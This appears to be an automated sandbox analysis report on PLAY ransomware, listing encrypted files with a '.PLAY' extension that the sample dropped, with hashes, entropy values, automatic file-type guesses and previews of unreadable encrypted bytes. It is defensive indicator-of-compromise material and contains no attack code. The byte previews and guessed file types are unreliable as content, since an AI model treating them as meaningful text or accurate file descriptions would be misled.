        SHA-512:9A4FC99A99EAC9B7B0CB00CF21DC04324243E1BFD52EC70F17CE23E0F17422C9535557D5A36ECF466385D94CA36673A0A3D7991D7C1307B6D89499E42299171A
        Malicious:false
        Preview:..*.W.G..|.........."..>eu"e....W.....<xb...'.o$j/}z...=.y.`z.[|..X:...,|...v..e.W^.W.@.9..... ..yqP.".T.T.....c........"...5..h.f.N.d...\wv.........N.N.wE\..BD.F.|F ..7'..".....`.v..&o.0..2~.............*'d..k.H.v%3Y@o@..zf..z......,.S....:6..9........05=oZ..4.l..@..H...5........J.a.Uj..|.0}q.t-$a.'7...k..tR.O.&)..2.t.....K..{Ceh.E.k..und.`..k.c~.........T..U.|.!.I>..........................5+s0x....zQ.z.......F@.?..=...fo5......M/.I...b0k6.K=..F`dl......(....B:...|..)....bt4...k.+|.....y.(.v.=..u..N.x....d.k.....YG..../...;.R+.....`/.a.N..6T..y..].-K../S.-kS..8.u.K....(.k....2.;.yx[.]P+...|R......B.<AY.....y.&.z.1{.4<.>iW.%.<.o"...!(..)...=A...).4 .u......*.Xd.C.p...1o..YmIf...!p.s.....O...b.\.B.2..$..|.....9{...$..]...d.>>.....N..N9g......\@...6..{.....k>...>.R..`5@..>..l..<.."..\.Q+.*.x...I..2y.3.........y....I..[#../.......qJd..2..i'.......1.{&3.....8E.i@..|.~F.c.a.4.xY..@.&.KM.*...t4..r..)^.O.XWZG..M'B.c~...`....{...3....E...D....t.

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft Help\MS.SKYPEFB_BASIC.16.1033.hxn.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1464
        Entropy (8bit):7.821088873818155
        Encrypted:false
        SSDEEP:
        MD5:102D4806F41008AC77A2D0EB367FA949
        SHA1:7E4A1ABAC7AE854BA509ADEEFC25E6B71DA0756F
        SHA-256:D3D9341175C513D1E122DA7F9551C6EAB5C90E760D18AECDFE3690DFEE80405D
        SHA-512:5F5FC6D9597C35E6EF56849B8B8AC5B1BE8A25202CFB8F09735C1A11D54CA1861D169BD74960EA047F1343A2FA37E00EF0D05F54BE5CC47D99F32769F0F4CD80
        Malicious:false
        Preview:e7oxA,.S.....`..! 5..........uRBu.j.e..G....eM. (.c..?.oY.-]....=.G|....u...V.....y..O.c..h.x.....w.6.....>..j.....+V....}.....C ...^\.... Y.%.....&$...!......}.t.B.ha...OO0.K0.6...|..m.Q70..?xO...1)a.S...........!/...W=X?K..#...5\."....~=..4.>...!.o? s#....*.Lw.K...^...@W.......F..?{.....$MZ....".t?|6.L.....X...wr....Re.)..An...96..T...y%`..=.F.K.d.......s.fI....W.-..bO.y.e....T..U.|.!.I>..........................]{.......bX.+.....P.........a8...........E.8....F<.d..J...k[.V.........R.x...$.H..@P..%....dW.c.........R...#L4+.^.-..j.m.XH.... g.h.......N...P&2...p.9..p@8.[T...H...'....A.n..n..{.....}M].'(.i../...........z.?...*;.G.......k...i...?..v$...X..0..!.p.8..-~....X....r$`c.Qd.6.p.'.1+.ctnQxMKN97X..X...D.$.N..kZC.....1.{.p...[,FHd."...0Un.>..=......ur....2.s...r....yO;.....u..?. ,...#....J.r.y80.,J2...|..($..a....Z)q.P.W....K.....H# .bruyl5.U....P~R.......N...@......QNaJTNk.gG.h....V.).5.#T.g..;~&.Q...t.i...Y..W....cG....>....El.L

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft Help\MS.SKYPEFB_ONLINE.16.1033.hxn.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:PGP\011Secret Key -
        Category:dropped
        Size (bytes):1480
        Entropy (8bit):7.856510921499888
        Encrypted:false
        SSDEEP:
        MD5:C36CB1585CC8D853975BC41162F7B693
        SHA1:6C33FB86E19488C389257B5CC32E50EAC4C830A2
        SHA-256:07782C4F92680440FCE0248DF59F0CC9CA0C4178474623C5E0720F511DE0FDE6
        SHA-512:4280D0F3B10634EFE31FCC28803B95878CB455CFD36AFEB036A5AFF2ECCE61F4099AEEFA9A42F57EAF75D7BA68ABDCAF312EB76C4B56F48433061A0A9F73CA6B
        Malicious:false
        Preview:....B-..lP...`...[.SzeZ...E....M.oMJv....s....7)Q.^.Y......3.......Dvt...l.....@.,...Aq.uuD.:..L.....H,).....&.#._...M.Z.s..J..cL.l.....#y+.&.a...,.....}...5{Exk..h...B....tt9...)S.o~..q.O...}...x....r#.}...>..).g.\?....$...@..VF...*.<s.8...VZt.|?.....I.[H...W......I....M.....(`..._...(..$.;.},H.f`.....;,.M2.-h........c.d82.@.dj\.,7..d.Rd.Q..T.-......._$..3...~.?... ..[.'.=n.L-0.p.....wnh..1....T..U.|.!.I>..................................8.......4..G..H..ph..fH.N.'\...$eB..U....G...cR.......U../.^.xx......-yl.)...-};L.e....2....{..T..{....E.....yE$...-Y....$..!.K....m).p.^..Fw...3k..Q..B..-[J.....D.:^......% #...F..Gx.^.4O.$...4...S..6.:.M..y..|`(.g.4c...Q.. ..S..u"1D....S(=t.A.....I.1....Ap....m..[Ur..w04.XN. ..2...".3.d.a.%....3.&.W`J....b.....D\..u..U...I....a......:.R..r.f....Cm.....w.Dx|[.._..^t..2..D5x.d..z...u..=.C[Q.\..........o..~.p.?}.J=......._.....#\.I."..<.....+.FoPj.......w...%.D.L....c.c..4u.oNe.J._.._<p4...x..X...q.d!1I

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft Help\MS.SKYPEFB_ONLINEG.16.1033.hxn.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1480
        Entropy (8bit):7.870765720216567
        Encrypted:false
        SSDEEP:
        MD5:8F0B6BC86A929134372F07E2C86B547B
        SHA1:E1D1277457F488AEC6054D0194B9C9AB0C12C571
        SHA-256:35A2C988EEF7E8E0281AD24A6BCBD048EB8BFD6ADDD323F249DC1D481B82E57F
        SHA-512:72E18F491F9944D059880E7D67DAAEE36580901C27FDB0B797439012E4F4641F3B25C76B42EB82C5D8AE52BE5273CC873BA5C861821B0FEB1405B2F9CE4DE922
        Malicious:false
        Preview:.4d.@..........x_.>mr.M.r..aR..Z{..!...=.*...........B...H.....qAf..X...wb.t..T....d.F...b!.]U-..L.>...c.7.....3w.f..).....x@....a.yys.6...DO2.Wbl8O#.E&. .YWo,...........)...8.............|............]?@.....F#...]?'.....\....`..a...Z.4.cEl..5W"(..? (|.y..{..X8..=&.c.P).m.t..:.......@..N^_E4..>M.Jm..... .......#.....o...8..Vh.L.nt...\.3..3T.Z.X.....eD.b..4O0-.m.:...........+.....G....T..U.|.!.I>................................H..Zo`/X.?.M......W.0H6:.#.@.h.A].#l_.A.f...p.[...@/.A{...?..X&c.Y.........@..l.q..?...=".d.q]`h.f.Hs..V.g.......3..)...+.......*.[.......h=m.w..!.}...u"....oP u.....c...d...k.S......"..>7...?..<.....Hk!.htf5'.V..n......]{I.1.....rY......s.,..........j.sA.ED.e...<.F..'i..^.y.'.L......S...$#.....R...<..QR.2...mO..m.^t.6:.-.r(..A).c8]}0...z.0..H.....mb.a.M._.i*.Qa}y..O..:..pe.p.Ge.*./..b0..?...F/.l....ade..2...[.y.Z.9.q..|..A..eS`.......U..t.y_}!.;...u..2.......bs..T.Q.......I.n...a"Xf"u5~.......E..s

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft Help\MS.SPREADSHEETCOMPARE.16.1033.hxn.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1512
        Entropy (8bit):7.875448275379418
        Encrypted:false
        SSDEEP:
        MD5:4A743485F17CFC3D0CAE4ED528F4AFA7
        SHA1:D4D053912966B6E0A37B6B0DFBE2948C061ABF8A
        SHA-256:3405F040554E016AE7113C9B324595A58BBA4F4223143FC45574B8B08B457035
        SHA-512:40CC46207BC08F83AF8AC6E55956360BD08B3C394768BD8A51D8F791F573B0071B5160C155EE46041035B9F9604FB814155AF85DD2249CFDD77C9D51D04E81A2
        Malicious:false
        Preview:B......l.|.gVlV.6.l.t....<.JX.d9...>h.....s~R....h-).K<..v.x.4T.Y.X.......K.....2Y..J.Yx.T+....".UH.y.x..F.!r.u.T.P...bk) )%......X...=....ng.]<I.....6X.....`...)eU..]........>..........99#.?.S.......#.._.N.<~...c.e....P.o.+...Q.....T.#..jcAz..},d.-..........i...r.g1.BV..&rw.....>.P...j.?I....>GN.O.[U..1.OzA..2v.....+....t..0)..{!..'.+%....*z....a...._..`....g....2......z2.......A..N$d..........%@q...g...1L...........T..U.|.!.I>............................n.(.X...D...cI..'...!A......r...../.....E.r4U.@1.......nLt..E.`s.]....y.r.!..........'...[.>U.Aw..@.8..N.h,.ZF...S.0.`R.;...k.qr.5H...L.N.L..X......'(..v'C..d..M|9.....r.........7i(.....(.b}51Kp~!...4.......Zv.zF$...`......q..y.........z`..~..D..x=.6.G.5.E(W.'.^.1.Q.:...7..,.>?....U#......vf#=K.<._!.e5..O..g..w...E.........W...tl...S.o......A^4.=(9n.Q.%D3..Hj<.u@.K.T.+B......nJ3[%'6Z......D..D"l........F.........2.V..#U..|.f.$...4"...r...{*.m...Ke..y.}hX.....5.y...,ze..B.[./..KJ

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft Help\MS.WINWORD.16.1033.hxn.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1432
        Entropy (8bit):7.858083053598704
        Encrypted:false
        SSDEEP:
        MD5:25C88F1AA76540D7965BC53DB915B051
        SHA1:2E2CF19305DA3A346EF4002F0A487189CCA5DA21
        SHA-256:1DF23F20FB094900938E9A0E3F9F80A03BA06D14E7165B6EAE6BBF5F76FC8D53
        SHA-512:B7489EE5777FF43B259B031500959F59F069B1A70D91883EB40A6F118D477A65F473D9626ACC482CB66A12A45B921C27A63D03017BC026B909875E78A90164E6
        Malicious:false
        Preview:...H.....-}....C1.,.....c.H%i{.O..K..x.%....y.......tiu&.:..:.....#...p.~.Hz..x.[..3.g..D.........*....Vo..A.....x..A..~./:.......k.~.5nC.!k....K.B.A_..+M.....@3......A-fe. g....G^.....W..kFH`p.s.........Ni..3.V.J....mq>.t\.2.`.&E#.k...3Z....Fyx*).;...(b=..G]..?.........K)NJ....;<......*Jzq...6:...@....-....b.g....?v.n.5..u...DB..D....\.`.Pj.]..T..U.|.!.I>............................x..j.%..FP.A.j..p[\..yz.......c_..!..5.......}..`s.`.A..8wgGO..isz.....c.&..b..p...j.....i.r.W...L ._B6.b...A5.n...7;D.."..1.jE~...l.Y..:'..c..F..w...c..I..yW.....?.N<#|h.^G....4.q0.d...J2|@tu...#.x(S......K.7....'..dz..q6W-.......9..........+.nE......x.....x..[|...=..8.w.NE.oE{......?....E6.??.9 ...d_....&.h....%{-.r-.S.t..y..........=...D.{.m.......*./..1.8.'SW.<O# .D.N`_R..k...h......jH.,1Z..dv...~7.""7L../u..I.w...`a~|......R.|...~..)....x....?[..P.....]@Q.....#.t...qNA..Q.t .>^.{x/..G....MO......m...[~Ha...]/....yEgP)..9Jo..Q....>7..

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft Help\nslist.hxl.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):7336
        Entropy (8bit):7.975258605104679
        Encrypted:false
        SSDEEP:
        MD5:C0F2EE9176DFA80ED34A003A1181A35B
        SHA1:335FD56936DD0FBAE86B4043566370C4F9ACB38C
        SHA-256:C907184065F1710D5A1A1DB118ADAF6333689736754D3CFFF67D6A7111CF9C5F
        SHA-512:FF79082A1CAFF75C2D8E7FF4B6220E5B6007CD4B12384CDD950593E8AC35AD5DC1556130C00E2DCD6C3229D89E73DDE781E12DC927F4787160DA5784BCEA3BB4
        Malicious:false
        Preview:..}.R.7l.'g..!.....2S.L..T.cr..>.Li....KDr~..'`#....R.._$..$<X......gVV..=.T!..8.S...y..A.......m...Vop.......?.K.I..^..v.3.?p.B....cQ9.(...=.j.Q:.6.U..9.S....[+...a..}..;....J....A..2..gu.@.>..~eQG7..(.B..V...~..{.#C._.N......E.l.Rre.E....eE.....Tb[.<.3..f..*...T.....@u...T...JI.^.............v~..i./-:...,6.2|.i..Zo..{.P..c.....L........(.....)Ib.f*.......%.ON..(...<%8.u...Gb...b......Q.}_.@)_.......3..-...<.3........h.s.M.{6"Z....,./Y.-9.....t^U.L.z.b.y..w.7....M.....9..Uw....W...c8.\@..?.....$.<.....N.w....B%....e......";VJ./....T.n...$.....3(..,oR.)....Sj....=_.....)kg.A.!.4.#6@..G..........Lx6...YU..27..G.7..1.wg....].p_......m..d...B.T.14...z..r7....jdJD.I.8...Y..g...S.lPx._.............T..].....p.5.......(..c-.^.Xn.O.l[T....k+..:..lM....v`..iYS..Ik.PF...bu5fC...$......MzJ.{.ru.,..\..e..C......_.......o..;.K.EF.s}L.^RzD..20Bd...a.v.iOHA...P._....(..-...@a..........:?{W.h..z....v.}E..M...8.E.GRF....-..p...eqrU...{D..$0f....

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft OneDrive\setup\refcount.ini.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1096
        Entropy (8bit):7.801465299830693
        Encrypted:false
        SSDEEP:
        MD5:03575F11A9393686A100B9C37B156C49
        SHA1:DB61812D9F3A5D337B2BC5291816721278B57210
        SHA-256:A1A5ED78546092288965D44BC58C2F948E4C45E88AAD05F68FFA3C4A32F09779
        SHA-512:62E1E8CC88B8597FB741B3AF7925A802A5272E07C42ACB8F210F203CFF67B58816E8F4C581811814DCE81EC7F6A069FA25E21A6F7A7324CFF25DFB7AC5ED1D98
        Malicious:false
        Preview:.......t..P......W..2....I.*...T..U.|.!.I>............................._+......w...N......U[.....Ed=...}.{.UH....A....."a....q7....,........#.j..........HhV.#X..w9F...?...../s.|).!........hn-df.Nc...b...B.Y.*6.Q........J&.Z4]2~.04]|r.......6.A..I...U.%:.v|E..]........@^...P$qH...C."g.7Zzu..4...-.lu^F..I.4....6CMZ.Y..(..bm..F5.vwY.8?bQl.7.....*.<..$.....=.;.....0.S..WZ......._N8{...v.GL..K+T......6.@?.F...h.hWL..;...Mh.U.Z..t:...H..c/.{..4..y.t".........,4...}.mA.....U^.p..A...jU4.\JW.y...X..p...ZKx.BsC....f.......#.!,.dI.&1...WI.......5._...[..g....T.\6o.v.;.h[u..a?..$....2....YD.r..l.D(AW7...%.-..<.y.V.`....p...Y+..^.>!...B.+M....0.S[G..|."...7.Cb..Z...q.../tu....S..*i....t.p..8.b.-g.?.1.#c.O...g[X..2....x.B3.F..L.V...4sdMa..@..E.S...7...F.h.d`.@t.h...^>..E..m...).s.v^...I3CKi...dQ.$...q.'.....(.Y..0..@&.j....Ye.4..%t.....q..[.Q.G.:%..~.=..,...........X...8...~.._.....9.YM........6\pC....>.....C..D.x.u..ZS....e..Z.<.....K2.uk..^.Q..DU.\q...>..a....B

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Oracle\Java\installcache\baseimagefam8.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):70998744
        Entropy (8bit):7.192133965564286
        Encrypted:false
        SSDEEP:
        MD5:99BF2E490B1356D8D5AB51C2048F51CF
        SHA1:D83FEAB02729D744F492DF1E76CB709AE796D22D
        SHA-256:199D3FBFF63C580D2D9F164BB343664E8A8FD7E4915E45F8294476B52D390AA7
        SHA-512:3B60A7DDD66F749EDFFEA6645540C1192003AF6863667091FC6BF3D23E0CF1B952A89BC6DCAA4F76522392BC1DF91B28F61CB77DB2AC10A4116CA2AE1482E9F4
        Malicious:false
        Preview:._EO.......i1...5.Er...p}..5S..jpz..r..P..#..4.....B...v?ZY[..J.#..,...e?$3...KM.E....{.L...5a.o|.h.o3g..]..)..(.sv.g......h.a.nd.....)...gV.9.....O.L.Yg2....d5c../..>..Fn..p..$..y.J.5..lW..K.........|.J+..2oT...9.V:.]..c.>O..*.$.X.H..GI.z...,.j..C.......I).a=.8".|..1:yesJ...t...V.".....:$....#"_..j...Qe.kD.l......+Ze.sc1%...@.#...S.n.7...Ic...+.....g.}.........n.....'..IF...qyctH...g ..... .s;.T..%@.5......./Z.I.....f.(..........\.X..\x..].9...AG7y"..x:8......U2....L..cE..o...........f1.2.*.6^..;.I_.B.sQy.<O.;....l Rm...1[....E........y+]..C{,.C...e.3^{...o.. ....d.d3.......p..!.?1...)....A..o.h.}..o....O.a..?......p..dc..~..:...6....[)........44#C<..Y.A..i....-m..&.u..)B....(.|..D.7.F*...i.>"{s...U.a_B..pQ.V..M...'.un.P.U{.)o\....U.0E...cSs=.{.-..*."?......96..&..-37....f.:.gf:>:..a..tg .{z.;M......./9M...!...> ..\*.L<.[.|Z6...&.?...C.h.......W...X=.o...[B..4'.(.N.O.k..#......9..4:........Y...<ZT..e.:.\......;x.d...[..k13l.

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\state.rsm.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1912
        Entropy (8bit):7.904634776120815
        Encrypted:false
        SSDEEP:
        MD5:033D0113D58676C879743931E39E553E
        SHA1:017B11A55B935C6A83E323B2BEF903DB443BF65F
        SHA-256:4FF7E748A8B8C09C02D6789F1996E5CD0BC56A9817A733468380501586F0C31B
        SHA-512:F80EA34210EBB46F4DF6B33FB18B95F86FDDF005CB1FA6B1E897F8070AD6565715B3FAE4A3D8E0D0CAB86F7A51991C96E317F8FDB0A0E490D64429D92A277616
        Malicious:false
        Preview:V[.Eh...W[.e[...d,bWU....K"....j.6D?0D.....q...#...Q......u..>..]8-.....g|.E....S.....c 0...r....3.B....K..\T.....6kn.nHj`..../..vL.1."...\....imY*5.#.....l..>.P.RqL...?...A.E.../?A.oo.x".f..Z.vsr..1i.7G.".+y.....n%.....*CT:.....lj..;..(...fk...NTW..%....;.li...n,...c..%&.G...V,x....X..=ur .......zc.{F{...?....7....=.C...,..$H.P....C.*......QWVW..N....n..$H.......[......T..bv..@..Y..v......4..g.$.$......i.a,9%...I...9..R...`x......u>.......c....lz^F/...j.9[X.......j.J."JGU..o0...7....+...4.sC..k'...GW.>Q...A<M.i.~e.....{....yN.(.bI./.~./...5.......8....3.R.%..O.=H. .V......_.6.O>..u.w...`..pl.K..1E..J=.~.#./.<w.Z...>.V.E.T.....(T.....p..Z3..<....P..yN.v.@.(s+.........V....C.!zn.....E5..1K.srI..^Lw.)...O..N....w...c.3%...ts..'L.&{.^.W83..gNK....@..y..Tw...g; ". |.E...R.... ...].`..HP.dY...T..U.|.!.I>..........................Z..*.9.=G..(..0~..L1..I.a...Hrpm....R[."p.d./U.t...k.Ax...3......\..t..Oa...%.\+F..5.7.}H..YH....Z.>3..y.%.f.

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5730392
        Entropy (8bit):7.998192276134512
        Encrypted:true
        SSDEEP:
        MD5:F93141E4711DEF0536A9525CAF2AE8A9
        SHA1:32E35043906EEC39E569EF17EF09E12A3D118E8E
        SHA-256:46BDD48359AA47CD01FEA86360B7DD65C2F23F187CA6F7DF3698092F1E828C6A
        SHA-512:58887D350B03FC4E8D51A65F629CF342A889CA1656418EEAD7E11783D0F3BF076804906C7EC117705C327DA3E188EAA10092F6F25AE37C708C136BD024F31FA3
        Malicious:true
        Preview:0s.*EQ.U'.. ..K>.r.c$....G-.V.f...".k..LF(.1..i.u...};A.=+.s...l.p<.W:...@c......uR.dO..|...$n..C.A.....4?....DG..H.P...Y...Jec.S..v.g.].3....K..^.....%.7b{..v`m...%.S.Fl.....}6".....t,a.p...7C.y.b...!,`.F.|...>\.O..")..bi.4b........X.I.......U}.;]s.i.9lk.......wX.P..'...(+.. .[SD.T..:.o.._.......t.d..k.....;6..N._.cm....<..cb.....iLUS..U.L..r..P.....l....`&.9..1F.........,_....R.c\.|.....m.k...j.q"D|..T....o.>.Um..-V.cuQ..l...<..:.....!.....Wp{.....i.@6.fQk...x......c.>t.w..`,dx....j.+.j%...d.. ^o(....w..*..O..2b.Rh`CH..i..G.)..^.ln.}|.(I.....h.Ii..U.......e..O:..1.*.fAj.....pa....,+I....\..lNa\...R.......d.4?X..6wT>W...C`.gV..m|J3..:.."qO.....2.b.q.S....#...z... ..b^......v.(...81e....K.,.v.{._..&l......q:....xw.j.uL...A] .c.cvv.....(.....\.....tz.&..@,?.'8.....M.....)\.J...u....;t3$.D.!,.......o;..,]af.B.\.......o.$.#.Xw.Q.~,U...7..(..U.$..Z..?..?"0.1h6p.J...Q.).@.. ......'..Kx.Y....$.Kk%.-X.i....!./.u..<..g.r....*!;~....Z...^J.t+O%

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\cab1.cab.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):998120
        Entropy (8bit):7.99978805820675
        Encrypted:true
        SSDEEP:
        MD5:6A6E9ED2B6280CFF9B790CA7C89FAC9F
        SHA1:D110CA5A10F4C6829CA1F345CB7D11766093929D
        SHA-256:BCC54FAA1C69F0AB10E5A32E49C02BBFC31D1B71EB80B93A9AC8E25918440C70
        SHA-512:453DC440786FE6292F200F57A8BB1485DA5597894D0C70F70881E0CB2614129F354E3B9B0C2B9AC1D59B1DAA8BAFEDDA1E7581AA5BF07E0A22BB1B8E61AE0BFE
        Malicious:true
        Preview:.w.N....H.znK...+=>.....^5.k..M.6.....q.=.#...~.L..7,..%..-...'.J./.:?p....E.yh......&p.........Z..(..G. .!.....,.Dr..,.@f......2r.0Y...4R5....-...+r.$..H.w.k.,..zW.-..J.x.....G.OY...y7P.3.7[.W...i.rD.L.f.a....0.3.........r..k.iz.w6...N5CHL...g...E.....<.....c...*...."?X...I..1..q1]....:S.#..@_.9!..4..,Y.O.r..s..D.$..@[s....p....2....".....l.....=..8..`0;......{Y.+YM......|..Vp%.J+........s\k.... ....m...o..kz...'..._-.@}.......K.Z...'g....s%..Z..f.~q..._..%..~|.Q,....g.......fy).....>#.._...^........x.7:..A..*..........B|.).>e.!~...xlw..!..ib..M.Y..PH"E...-...@!Tb....,.K(g.;..ok......#?.......,.h..v..Y.u..{xB...He......A...P....cv.iu...mR...,.DF.n..#Z.[.C..~..MBR.....5....<..T^j..B."'.."pH......j+k..5^.....k$yt....^o.f.Hf.^J.i."..Z...=..N.N.C..0......}......i..bi..tW..T..(...HC..<.JZ....>Z?.7;1.fT{Bq...I`...G.AD~c.1.cw.:..Y.4y.NdH..+(P.t.Q.#..DN.}. Y.l.Fs..y.T.R0..l).gEv{.?lP........_'/..be.0d1#'..,R`....Y.d#..X.Q7...o-..l..]..j.A

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\packages\vcRuntimeMinimum_x86\cab1.cab.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:Dyalog APL version 167.40
        Category:dropped
        Size (bytes):1375656
        Entropy (8bit):7.99988789095555
        Encrypted:true
        SSDEEP:
        MD5:BD2A015513042A906CF555EE88FF1D3C
        SHA1:E48C2BDC7B03C50E14795ACB34098204B67D5B98
        SHA-256:8B51665B139F696D9C11E1EFE234F663DF450470DE3584E6DBEEF140F27E9D36
        SHA-512:472A14F2E9459F1EBD97AA23508BA63DCC3AFE75A0B908BBDEE1F9420F25944DB24A3B16D8C0D643A82B73EFDE0015810720F0D87BA624462D4F973E96F045AF
        Malicious:true
        Preview:...(.Q.].3...i.bU~.ZvPk.0.T.~.6.../Hgd&.(..U..]..9C.I..o2.t.D(._=.a.Nc...[i7....UK.....C....{.o.....XM"......=..R...+..q.).b..J.......(.h"....'..k......e.sn6...g......:a?6.w?&..).OE...(Z.m..m~.vE7...nL..iF ....$.A.n..&s.(.]zcFQ...Kzq..G...U.9..A...@+.%.......l."t.......71.W./[lQ....Si..y$........>.9#.&j.#.k.I.wnx......P.:.*...kK@!..|.m.<....P(...e.&..S ..m..D./(...f..y.<.Z..L...t..L....4s..s..j.O.. Y.C-....^C\....U...63..+....!..'..x..]......EdB?$..T.....i..1.c8..e[4.p>#r..G..OQ.....2...e....0.RL._t.?...*00...6....P.x.<7.I..I.c..(.xU..r.O.......zh..//f...$..R...O&...Q...{...nA..(.s.O.Zf...%.[.yu.....>..!../.u00N....a.......7!...gjB.O504P.D,.....%...#.J^vU...UP...z..%..j._%..8...M...8.|..Z....v....[...l...r@.....tzeZ.j....l)m..m..>,?o..Z/._..R..D.....U.m.e.E.UA...3...LM..&E.H.'F......XK. v.......1..$.2.!.*N]D.......x$.R.iZi...h>.tj/.Do...`.....-s....?._..P[2,*...ul[k...s/2.3.K.....X.P..x..^.j....j....5..,.\...~..T.YS.)-A...{.<...... ..C.

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\packages\vcRuntimeAdditional_x86\cab1.cab.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5207768
        Entropy (8bit):7.9999677828535285
        Encrypted:true
        SSDEEP:
        MD5:2D154531D08C6534F1FCCC64F74AFCBD
        SHA1:2829B6ACB6F212C1E491EE841CDB457F97E48047
        SHA-256:FC0EC919BDA88BFAB71E28912522BA96C8EB94494B0EBD3BA42294E11A88C3A7
